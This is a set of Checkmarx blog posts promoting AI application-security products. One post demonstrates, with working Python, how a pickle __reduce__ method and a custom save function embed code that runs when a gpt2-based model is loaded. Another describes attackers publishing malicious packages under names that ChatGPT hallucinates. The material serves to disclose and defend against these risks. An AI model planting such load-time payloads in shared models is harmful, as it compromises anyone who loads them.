Just Launched: Checkmarx AI Security
https://checkmarx.com/blog/just-launched-checkmarx-ai-security/

Why AI Security? Because you deserve a better answer than “because everyone’s talking about it.”

There are two key challenges around AI that make this an essential area for AppSec platforms to address. 

The first is that AI is disrupting the developer workflow that AppSec teams have worked hard to integrate with. Large Language Models (LLMs) do not understand secure coding practices; however, developers are increasingly relying on them to maximize their coding output. The result is a flood of insecure code directed at already resource-constrained AppSec teams, who find themselves in an increasingly untenable position, especially since many developers neither understand nor practice secure coding, nor prioritize AppSec.

This brings us to the second challenge: AppSec is already hard! AppSec teams are generally under-resourced; they rely on working with cross-functional teams that often have opposing incentives; and they face an increasingly complex code environment. Analyzing and prioritizing vulnerabilities was already difficult, and many teams have long given up on the idea of getting their vulnerability count to zero.

AppSec teams require cutting-edge tools to keep pace – and Checkmarx delivers. Last year, Checkmarx pioneered a strategic approach to help AppSec organizations get the most out of AI. Today, we are excited to announce the second wave of AI Security features from Checkmarx!

Checkmarx’s AI Vision

Checkmarx has a clear vision for the future of AI in supporting AppSec, and sees three key opportunities to provide meaningful assistance to our customers:

  1. The Developer Workflow: Developers are using, and will continue to use, AI for code generation. By plugging AppSec tools directly into the AI tools, Checkmarx aims to help secure code from the first line written, while also securing the software supply chain.
  2. Accelerate AppSec Teams: AppSec teams want to use GenAI as a productivity tool in the same way that everyone else does. Checkmarx is creating tools and platform features to simplify AppSec management and increase daily efficiency for AppSec teams.
  3. AI-Based Attacks: The use of new technology always brings new risks, and AI tools are no different. Checkmarx will help customers protect against risks targeting AI tools in the new developer workflow.

Building towards this vision, Checkmarx has already supplied developers with core features supporting the changed developer workflow that AI has created. These include our AI Security Champion for Infrastructure as Code (IaC), our AI Query Builder for reducing false positives, and our Checkmarx GPT integration, which helps developers understand the open source risks of generated code.

Our newly launched features build on that momentum, giving developers more ways to embrace AI that fit their workflow while remaining mindful of the business’s responsibility for its (and its customers’) data.

Auto Remediation for SAST

Resolving security vulnerabilities is a necessary evil for developers. It is often time-consuming and involves significant research and context-switching. Each vulnerability has its own background that needs to be understood before a meaningful solution can be drawn up and implemented.

Our new auto remediation for SAST functionality, part of our AI Security Champion plugin, aims to significantly shorten the time and effort developers need to remediate vulnerabilities. Developers now get meaningful recommendations, directly in their IDE, on how to resolve specific SAST vulnerabilities – making not just finding, but resolving, vulnerabilities far more practical.

Want to learn more? Read about it here.

Checkmarx GPT

Code is code, regardless of whether it is written by a developer, copied and pasted from OSS, or generated by AI. It all needs to be scanned, and if you want to scan AI-generated code successfully, you need to do it in real time. Checkmarx demonstrated how with our initial Checkmarx GPT integration for ChatGPT, which analyzes generated code for malicious packages, hallucinations, and potential versioning and licensing challenges. We have extended Checkmarx GPT further with the ability to perform a SAST scan as part of the process. Now, developers using ChatGPT can get a full security check of the generated code in real time, along with remediation advice for specific vulnerabilities.

GitHub Copilot Integration

In the spirit of our Checkmarx GPT plugin, we know that many developers use Copilot to drive their code generation needs. Many have Copilot integrated directly into their IDE, and just as we did with ChatGPT, we knew we needed to provide a real-time scan of Copilot-generated code. Our VS Code plugin for Checkmarx now supports real-time IDE scanning for all types of code, including Copilot-generated code, giving developers a super-fast SAST scan of code as it’s being created.

Read this blog post to get more details.

Prompt Security

Checkmarx cares about your data. We understand that for many organizations considering Generative AI, the risk of data being accidentally leaked is difficult to weigh. Checkmarx is partnering with Prompt Security to help secure all uses of Generative AI in an organization: from tools used by your employees to customer-facing applications. Checkmarx and Prompt are working together to help AppSec teams understand what is being passed to a Large Language Model, and to provide ways to sanitize and block unwanted data from being shared.

AI in Your AppSec Program

It can get overwhelming trying to keep track of all the developments around AI. We are convinced they need to be integrated into your existing AppSec program purposefully, with a defined strategy and plan. So, we incorporated AI into our AppSec Maturity Model  – APMA. When we discuss and assess your AppSec program with you, we will also consider your organization’s AI strategy. We will then work with you to build a way to leverage AI opportunities, while protecting against AI-related risks, using our AppSec AI solutions and best practices.

Learn More

As the adoption of generative AI in software development continues to grow, Checkmarx remains dedicated to guiding organizations through their AppSec journeys. By focusing on enhancing the developer experience, reducing false positives, and addressing the unique threats posed by AI, Checkmarx is paving the way for a more secure digital future. Our investment in advanced solutions reflects our commitment to not just identifying problems but also providing the solutions that empower developers to build safer, more secure software in the age of AI.

We’re at RSA this week and we encourage you to stop by our booth to see and participate in live demos of our most recent announcements, and check out the additional blogs linked within this blog post for more details! 

Introducing Real Time IDE Scanning – More Secure Code in Real Time
https://checkmarx.com/blog/introducing-real-time-ide-scanning-more-secure-code-in-real-time/

The need to shift left

The pressure to deliver quickly and efficiently is pervasive, and speed often comes at the expense of security. To address this, the “shift left” philosophy has gained traction among development teams. It emphasizes integrating security measures early in the development lifecycle, rather than as an afterthought. We have also spoken about the need for security to be integrated throughout the entire SDLC – allowing you to secure your applications from the very first line of code to runtime and deployment in the cloud.

The rationale behind this strategy is straightforward: identifying and resolving security issues during the initial stages of development is significantly more cost-effective and less risky than making changes after deployment. By addressing security considerations earlier in the development process, teams can prevent future headaches. This can also help get software to production faster, as issues are easier to fix during the development cycle.

The best way to secure applications is to bake security into the code from the start. Developers play a critical role in securing the software by adopting security best practices. However, that’s easier said than done. There is a gap between theoretical best practices and truly embedding security into development.

The security gap in software development

Software developers aren’t security experts. According to the Forrester report, “Show, Don’t Tell, Your Developers How To Write Secure Code,” none of the top 50 undergraduate computer science programs in the United States require a secure coding or secure application design class.

Bridging the skills gap and fostering security awareness among developers is critical. This is why Checkmarx offers security training such as Codebashing. However, training doesn’t produce instant change. As a result, developers are relying on AI code generation for the speed it provides – and out of the mistaken belief that AI-generated code is somehow more secure.

The new frontier of AI-generated code

Traditional software development workflows are being reshaped by the proliferation of AI-generated code. GenAI tools, such as GitHub Copilot or Amazon CodeWhisperer, fundamentally alter the coding process by providing suggestions, autocompleting code, and automating repetitive tasks. This shift represents a significant advancement in the field, with AI-driven assistants seamlessly integrated into coding workflows, enhancing human capabilities and expediting development cycles.

AI-generated code is a double-edged sword. It offers productivity boosts and taps into collective knowledge, but it also carries risks. Research into the increasing prevalence of AI-generated code, and its potential to redefine software engineering practices, has identified risks of reduced code quality and weakened security.

A fact often ignored by developers: AI tools can generate insecure code. According to research, “Participants with access to an AI assistant were also more likely to believe they wrote secure code, suggesting that such tools may lead users to be overconfident about security flaws in their code.”

Introducing real-time scanning in the IDE

Real-time scanning in the IDE offers a security best practice for developers that complements Checkmarx SAST. It analyzes and provides real-time insights for:

  • Human-generated code as it’s being written by software developers
  • AI-generated code using tools such as GitHub Copilot

This is a plugin for Visual Studio Code that scans in milliseconds, providing instant responsiveness in the IDE, and it can even scan source code repositories. In internal tests, we scanned over 1 million lines of code in under 10 seconds – much faster than other “developer-friendly” solutions.

Security best practices

Real-time scanning in the IDE is the first step to ensure that source code follows security best practices. It’s not intended to replace thorough testing by your application security team or by Checkmarx SAST, but rather to ensure that code – particularly AI-generated code – follows secure coding best practices. It does not test an entire application, but rather code snippets – a specific line of code plus the nearby lines. The scope of the analysis is a short, relevant piece of code. Given a few lines of code, the scanner provides a security review and points out potential issues a developer should consider.

Unlike a complete SAST scan, it doesn’t find attack vectors such as SQL injection. Because it works by analyzing the adjoining lines of code, it is not fully application-aware like complete SAST solutions. It looks at the “micro” – a few lines of code – and provides suggestions for remediating the code snippets. This makes it easy for developers to fix their code as they are writing it.

This is a win-win for security. By giving developers the opportunity to implement security best practices, it produces fewer, more accurate SAST findings for the AppSec team.

How to get it

Real-time insights are available in a freemium model: users can get real-time insights from a command line interface (CLI) executable available for free.

Additional features and real-time in-IDE scanning are available for customers with the AI Security package. If you’re an existing customer, contact your account manager for more details. Not yet a customer?  Get a free demo.

The Hidden Supply Chain Risks in Open-Source AI Models
https://checkmarx.com/blog/the-hidden-supply-chain-risks-in-open-source-ai-models/

HuggingFace Hub has become a go-to platform for sharing and exploring models in the world of machine learning. Recently, I embarked on a journey to experiment with various models on the hub, only to stumble upon something interesting – the potential risks associated with loading untrusted models. In this blog post, we’ll explore the mechanics of saving and loading models, the unsuspecting dangers that lurk in the process, and how you can protect yourself against them.

The Hub of AI Models

At first glance, the HuggingFace Hub appears to be a treasure trove of harmless models. It provides a rich marketplace featuring pre-trained AI models tailored for a myriad of applications, from Computer Vision models like Object Detection and Image Classification, to Natural Language Processing models such as Text Generation and Code Completion.

Screenshot of the AI model marketplace in HuggingFace

“Totally Harmless Model”

While browsing HuggingFace’s marketplace for models, “ykilcher/totally-harmless-model” caught my attention. I was excited to try it out, so I loaded the model using a simple Python script – and to my surprise, it opened a browser in the background.
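
The load itself was nothing exotic – something along these lines (a sketch; the exact auto class used is our assumption):

```python
from transformers import AutoModelForCausalLM

# Caution: loading an untrusted pickle-based model executes whatever code
# its serialized objects carry – only try this in an isolated sandbox.
model = AutoModelForCausalLM.from_pretrained("ykilcher/totally-harmless-model")
```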

This model was created by researcher and YouTuber Yannic Kilcher as part of his video demonstrating the hidden dangers of loading open-source AI models. I was inspired by his research video (which I highly recommend watching) and wanted to highlight the risks of malicious code embedded in AI models.

The Mechanics of Model Loading

Many HuggingFace models in the marketplace were created using the PyTorch library, which makes it very easy to save and load models to and from files. The file serialization process uses Python’s pickle module, a powerful built-in module for saving and loading arbitrary Python objects in a binary format.

Pickle’s flexibility is both a blessing and a curse. It can save and load arbitrary objects, making it a convenient choice for model serialization. However, this flexibility comes with a dark side – as demonstrated by “ykilcher/totally-harmless-model” – pickle can execute arbitrary code during the unpickling process.
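
To see the mechanics in isolation, here is a minimal, self-contained sketch (the class name and echoed message are purely illustrative) of how an object’s __reduce__ method lets a pickle run a command at load time:

```python
import os
import pickle

class TotallyHarmless:
    # __reduce__ tells pickle how to rebuild this object. Returning
    # (os.system, (cmd,)) makes deserialization run the command instead.
    def __reduce__(self):
        return (os.system, ('echo "this ran during unpickling"',))

blob = pickle.dumps(TotallyHarmless())
pickle.loads(blob)  # prints the message – code executed on load, no method call needed
```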

Embedding Code in a Model

To show how easy it is, we’ll use a popular model from the marketplace (gpt2) and modify it to execute code when loaded.

Using the powerful Transformers Python library, we’ll start by loading our base model, ‘gpt2’, and its corresponding tokenizer. 

Next, we’ll declare a custom class called ExecDict, which extends the built-in dict and implements the __reduce__ method that lets us alter the pickled object (this is where we’ll execute our payload).

Finally, we’ll create a new model, ‘gpt2-rs’, and use the custom save_function to convert the state dict to our custom class. 

Python script that produces a copy of an existing model with embedded code (Source)
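
For reference, here is a minimal sketch along the lines of that script. The payload string, the dictitems trick used to preserve the weights, and the safe_serialization flag are our reconstruction for illustration, not necessarily the original code:

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

PAYLOAD = "__import__('os').system('echo payload executed')"  # placeholder command

class ExecDict(dict):
    """A dict whose unpickling runs PAYLOAD, then restores the real contents."""
    def __reduce__(self):
        # eval(...) runs the payload and returns an empty dict; pickle then
        # repopulates it from the dictitems iterator (the 5th tuple element),
        # so the tensors survive and the model still loads normally.
        return (eval, (f"[{PAYLOAD}, dict()][1]",), None, None, iter(self.items()))

def save_function(obj, path):
    # Wrap the state dict in ExecDict so the malicious __reduce__
    # ends up inside the pickle stream that torch.save writes.
    torch.save(ExecDict(obj), path)

model = AutoModelForCausalLM.from_pretrained("gpt2")
tokenizer = AutoTokenizer.from_pretrained("gpt2")

# save_pretrained accepts a custom save_function; safe_serialization=False
# forces the pickle-based format instead of safetensors. Note that recent
# torch.load defaults block pickled code (weights_only=True); the attack
# applies when models are loaded with weights_only=False.
model.save_pretrained("gpt2-rs", save_function=save_function, safe_serialization=False)
tokenizer.save_pretrained("gpt2-rs")
```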

This script outputs a new model called “gpt2-rs”, based on “gpt2”, that executes the payload when loaded.

Hugging Face (in collaboration with EleutherAI and Stability AI) has developed the Safetensors library to enhance the security and efficiency of AI model serialization. The library provides a way to store tensors securely. Unlike Python’s pickle module, which is susceptible to arbitrary code execution, Safetensors employs a format that avoids this risk entirely. The format, which combines a JSON UTF-8 string header with a byte buffer for the tensor data, conveys detailed information about the tensors without running any additional code.
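
As an illustration, here is a small sketch of the safetensors API (the tensor names and file name are arbitrary):

```python
import torch
from safetensors.torch import save_file, load_file

tensors = {"weight": torch.zeros((2, 2)), "bias": torch.zeros(2)}

# Writes a JSON header plus raw tensor bytes – no Python objects are pickled.
save_file(tensors, "model.safetensors")

# Loading parses the header and maps the byte buffer back into tensors;
# no code from the file can run during this step.
loaded = load_file("model.safetensors")
print(loaded["weight"].shape)  # torch.Size([2, 2])
```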


In Closing…

It’s crucial for developers to be aware of the risks associated with AI models, especially when they come from strangers on the internet, as they may contain malicious code.

There are open-source scanners, such as Picklescan, which can detect some of these attacks.

In addition, HuggingFace performs background scanning of model files and places a warning if they find unsafe files. However, even when flagged as unsafe, HuggingFace still allows those files to be downloaded and loaded.

When using or developing models, we encourage you to use the Safetensors file format. If the project you are using has not yet moved to this format, Hugging Face allows you to convert it yourself.

For research purposes, I have open-sourced the various scripts I use to demonstrate the risks of malicious AI here. Please read the disclaimer in the GitHub repo if you’re planning on using them.

Checkmarx + Vulcan Cyber: Enabling Customers to Mitigate AI Vulnerabilities
https://checkmarx.com/blog/checkmarx-vulcan-cyber-enabling-customers-to-mitigate-ai-vulnerabilities/

The impact of cyber-attacks on the global economy is predicted to reach $10.5 trillion by 2025. One area where threats and vulnerabilities persist is the software development process, with AI risk now a growing concern.

Finding and fixing vulnerabilities is crucial, but traditional approaches often relegate security measures to the final stages of the software development lifecycle (SDLC). A proactive approach to vulnerability management and remediation is not just a nice-to-have but a requirement for protecting your SDLC. By prioritizing vulnerability management earlier in the lifecycle (shifting left), the practice of identifying, classifying, prioritizing, remediating, and mitigating software vulnerabilities allows organizations to stay one step ahead.

Vulnerability and risk management is an important part of the AppSec and developer toolkit, which is one of the reasons that Checkmarx partnered with Vulcan Cyber.

First to Market

Vulcan Cyber developed one of the first cyber risk management platforms, built to help organizations reduce vulnerabilities and risk. The platform correlates, prioritizes, and manages vulnerability risk across all attack surfaces. It consolidates all vulnerability and risk data, correlating and de-duplicating scan results. It orchestrates risk mitigation workflows, delivers risk remediation intelligence, and enables developers and AppSec professionals to customize their risk compliance threshold and actively measure, track, and report risk reduction.

How it Works

While we have been partners with Vulcan Cyber for some time, we are pleased to announce a new integration with our Checkmarx One™ platform.  This means that Vulcan Cyber is now integrated with our traditional Checkmarx SAST on-prem solution, as well as Checkmarx One™ SAST, SCA and IaC.  

Checkmarx One is an application security platform used for scanning, prioritizing, and addressing security vulnerabilities in an organization’s applications, projects, or source code. Vulcan customers can bring vulnerability data from Checkmarx One into Vulcan Cyber to manage their application security and construct a more comprehensive view of their attack surface, thus strengthening their cybersecurity posture.

The Checkmarx One Vulcan Connector integrates seamlessly with the Checkmarx One platform to pull code project assets and vulnerability data into the Vulcan platform. Once the integration is complete, the Vulcan platform scans the report findings to correlate, consolidate, and contextualize the ingested data, informing risk and remediation priorities.

Plenty of Synergies with Vulcan Cyber

Checkmarx and Vulcan both have a pedigree in leading threat intelligence teams and first-party research into active threat actors. In fact, the Vulcan research team, Voyager18, and Checkmarx collaborated around our GenAI capabilities, including the CheckAI plugin for ChatGPT. This industry-first AI AppSec plugin enables developers to scan generated code within the ChatGPT interface, provides remediation guidance, and protects against malicious open source packages targeting GenAI-generated code.

Identifying AI Hallucinations   

In particular, working with the Vulcan Cyber research team, we can collaborate to identify AI hallucinations – instances where ChatGPT provides customers with inaccurate information. We are now seeing such hallucinations being weaponized by hackers.

Attackers ask ChatGPT for coding help with common tasks. ChatGPT might recommend a package that doesn’t exist or isn’t published yet – in other words, a hallucination. Attackers then create a malicious version of that recommended package and publish it, so that when a developer asks ChatGPT for help with the same problem, a package with a malicious payload is waiting. Our CheckAI plugin enables developers and security teams to protect against these attacks from malicious open source packages and dependencies while working within the ChatGPT interface.
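
As one lightweight defense (our illustration, not a feature of the CheckAI plugin), you can verify that a recommended package actually exists on PyPI – and check how recently it appeared – before installing it:

```python
import requests

def pypi_package_info(name: str):
    """Return PyPI metadata for a package, or None if it doesn't exist."""
    resp = requests.get(f"https://pypi.org/pypi/{name}/json", timeout=10)
    return resp.json() if resp.status_code == 200 else None

info = pypi_package_info("requests")
if info is None:
    print("Not on PyPI – a hallucinated name an attacker could register.")
else:
    # A very recent upload date on a supposedly well-known package is a red flag.
    latest = info["urls"][0]["upload_time"] if info["urls"] else "n/a"
    print(info["info"]["version"], latest)
```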

Getting Started 

Together, we are working to dramatically improve the end-to-end developer experience, while continuing to expand the AI-driven security capabilities of our CheckAI plugin by augmenting it with the Vulcan Cyber AI research team.

For more information get in touch with your Checkmarx account rep or contact us today.
